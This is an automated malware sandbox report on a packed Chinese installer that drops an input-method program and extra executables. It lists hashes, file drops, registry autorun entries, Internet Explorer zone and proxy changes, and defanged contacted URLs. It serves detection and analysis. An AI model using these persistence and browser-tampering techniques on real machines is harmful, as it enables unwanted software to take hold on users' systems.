Sample_002f865ab6

by malwarelabrobot on January 12th, 2015 in Malware Descriptions.

mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 002f865ab6cd2f05ca23808cbb09ebe3
SHA1: f8884bd41e88bfbe8c233259bba0b144453284f1
SHA256: 015f9407073db73916086c6cf68eb3e02a90dcded9db98f24ede64cf4345958d
SSDeep: 12288:Fla8UjwZQHW1F/K6fBEtdK7WGCMnA0xfpfx1k:Fl2w HspEvK7WGCwAup51k
Size: 595291 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXP SP3 32-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

install.exe:432
CreateShortcut.exe:1284
%original file name%.exe:772
KS1426.exe:2000
ksimekusu_zhim_007.exe:1896
OneDay.exe:604

The Malware injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process CreateShortcut.exe:1284 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\Ó°ÊÓ´óÈ«.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\Ëѹ·ÍøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (13218 bytes)
%Documents and Settings%\%current user%\Desktop\hao123ÍøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360ÍøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\°®ÌÔ±¦.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)

The process %original file name%.exe:772 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\-2203_1_mp.exe (269650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\CreateShortcut.exe (9276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe (230865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\apps.txt (1457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (20725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\OneDay.exe (108876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NSISdl.dll (14 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)

The process ksimekusu_zhim_007.exe:1896 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files%\KS2015011116\V1426\msvcr100.dll (25824 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÐÎÄÖ®ÐÇË«Æ´.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Program Files%\KS2015011116\V1426\imeunit.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (812 bytes)
%Program Files%\KS2015011116\V1426\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (285959 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Program Files%\KS2015011116\V1426\install.exe (1856 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\À¶ÌìË«Æ´.ini (912 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\ÎҵĶÌÓï.ini (24 bytes)
%Program Files%\KS2015011116\V1426\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Æ´Òô¼Ó¼ÓË«Æ´.ini (538 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\theme.ini (2 bytes)
%Program Files%\KS2015011116\V1426\msvcp100.dll (14184 bytes)
%Program Files%\KS2015011116\V1426\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015011116\V1426\DirectUI.dll (22192 bytes)
%Program Files%\KS2015011116\V1426\Library.dll (5064 bytes)
%Program Files%\KS2015011116\V1426\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÐÎÄ·ûºÅ.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\¹Ì¶¥×Ö.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ë«Æ´.ini (1 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÇÄÜABCË«Æ´.ini (686 bytes)
%Program Files%\KS2015011116\V1426\imetool.exe (6360 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOSË«Æ´.ini (674 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÐÞ¸´.lnk (825 bytes)
%Program Files%\KS2015011116\V1426\config.exe (11344 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Program Files%\KS2015011116\V1426\KS1426.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\жÔØ.lnk (613 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈíË«Æ´.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\ϵͳ¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\×ÔÈ»ÂëË«Æ´.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Program Files%\KS2015011116\V1426\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (0 bytes)

The process OneDay.exe:604 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FNHI9HC7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1G36EQJN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\20DNL7ZC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VBTRRG9A\desktop.ini (67 bytes)

Registry activity

The process install.exe:432 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Ime File" = "KSIME.IME"
"Layout File" = "kbdus.dll"

[HKU\.DEFAULT\Keyboard Layout\Preload]
"2" = "E0200804"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Layout" = "E0200804"

[HKCU\Keyboard Layout\Preload]
"2" = "E0200804"

[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Layout Text" = "快速拼音输入法"

The process CreateShortcut.exe:1284 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 85 2E 8A 86 6A D3 5B 60 0F 67 73 E0 9A F5 78"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process %original file name%.exe:772 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 C4 E6 03 D2 AC 58 0C E4 5E 45 06 D5 29 06 49"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process KS1426.exe:2000 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 95 C7 8D 1B 13 6F DE E5 23 8F 93 9A 07 1C 8E"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Config" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
"Count" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"CRand" = "433"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process ksimekusu_zhim_007.exe:1896 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Qudao" = "ksimekusu_zhim_007"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy9.tmp\nsis.dll,"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Count" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Proc" = "KS1426.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayIcon" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

[HKCR\JiSu.file\DefaultIcon]
"(Default)" = "%Program Files%\KS2015011116\V1426\config.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"UninstallString" = "%Program Files%\KS2015011116\V1426\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"date" = "20150111"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayName" = "¿ìËÙÆ´ÒôÊäÈë·¨ 3.0.3.9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\JiSu.file\shell\open\command]
"(Default)" = "%Program Files%\KS2015011116\V1426\config.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\.wlb]
"(Default)" = "JiSu.file"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"Publisher" = "cxmx, Inc."

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\JiSu.file\shell\open]
"(Default)" = "°²×°×Ö¿â"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayVersion" = "3.0.3.9"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"InstallDir" = "%Program Files%\KS2015011116\V1426"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"URLInfoAbout" = "http://jiguangshurufa.com/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 28 FE 77 6C CB 17 F1 B2 9E 76 A7 C5 65 8D BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\JiSu.file]
"(Default)" = "×Ö¿âÎļþ (.wlb)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ksinput.exe]
"(Default)" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\JiSu.file\shell]
"(Default)" = "open"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Entry" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Malware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

The Malware modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process OneDay.exe:604 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA CD 70 C1 06 21 03 54 44 44 C9 F0 FD 65 86 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

Dropped PE files

MD5 File path
6db1aab5dd1729e9045917fcc5c7a9bd c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeMini.dll
e96186aaa638e2968eed3361f61ab0d5 c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeSkin.dll
1d56753feda1d359317f39cd2926776d c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeTool.dll
56c833a0a45ebc14e2bf0230fe8c4678 c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeUnit.dll
293fe7132d2b950a6c4ee85b0f06a3ce c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeWord.dll
9ec7343e965f1f5da63daa34515be40e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\CreateShortcut.exe
678e0ebb76fd1af1fce5ac082d682f94 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\Furt.exe
254f13dfd61c5b7d2119eb2550491e1d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\NSISdl.dll
d2acd1407a3d27c309ce750b97e13d77 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\OneDay.exe
144bd6f3a3e1e040ffb03648e49c366d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe
bacbca35f6b7e759fff3c6321f6f1b2a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy9.tmp\nsis.dll
0e40d4a64f7f3637b3efb0ecbe645a6c c:\Program Files\KS2015011116\V1426\DirectUI.dll
2ac6987d52efc4e43955da4f3fb855e8 c:\Program Files\KS2015011116\V1426\KS1426.exe
ad42f2f8f08c085a04f2fd0d6b472176 c:\Program Files\KS2015011116\V1426\Library.dll
36d7d05505951f542922df4c725cc57d c:\Program Files\KS2015011116\V1426\atl100.dll
bea1a8d84f1d871c237b5634a7819047 c:\Program Files\KS2015011116\V1426\config.exe
1302954a19e63cb334c3e6a423caea0c c:\Program Files\KS2015011116\V1426\imetool.exe
ad41cb4c1277817b46d75f1af6aee58e c:\Program Files\KS2015011116\V1426\imeunit.exe
5d5609e55fefeff66ea45e524b422d56 c:\Program Files\KS2015011116\V1426\imeword.exe
9389d5662768d7abc078aecf51deada7 c:\Program Files\KS2015011116\V1426\install.exe
03e9314004f504a14a61c3d364b62f66 c:\Program Files\KS2015011116\V1426\msvcp100.dll
67ec459e42d3081dd8fd34356f7cafc1 c:\Program Files\KS2015011116\V1426\msvcr100.dll
bacbca35f6b7e759fff3c6321f6f1b2a c:\Program Files\KS2015011116\V1426\nsis.dll
ee68b052a08fec0f574f2dae2003df27 c:\Program Files\KS2015011116\V1426\sqlite3.dll
6dec6339ba7414dbee3b372ab94115a8 c:\Program Files\KS2015011116\V1426\uninst.exe
1cc5717f5e506daeb628506f10954788 c:\WINDOWS\system32\ksime.ime

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: uscter
Product Version:
Legal Copyright: ???? (C) 2014
Legal Trademarks:
Original Filename: uscter setup
Internal Name: uscter setup
File Version:
File Description:
Comments:
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23488 23552 4.48909 7ebfade271f75cb4c180603ab653af42
.rdata 28672 4496 4608 3.59139 9d6e96915262c9d1129a16fa0b02a19a
.data 36864 110456 1024 3.27356 dbf10679c897d0edeee280fffdad552f
.ndata 147456 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 188416 34600 34816 3.26755 727c03c4b9eda9d853630881e7a4752c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.google.uscter.hk.moyan.cc/db/apps.txt 124.232.146.41
hxxp://srftj.xmzs8.com/tongji.php?k=803cd96c0f74b9b3be5d61ee009ac9673b26d0ff0a4142acff7f40d8c5529bf151cc9b398f4910825321ddaf9ec9b80c3beaa32eed80a712eeb06f6b021af12ea3b9765c2819b1affd09c5cf3c47bed4 219.129.237.13


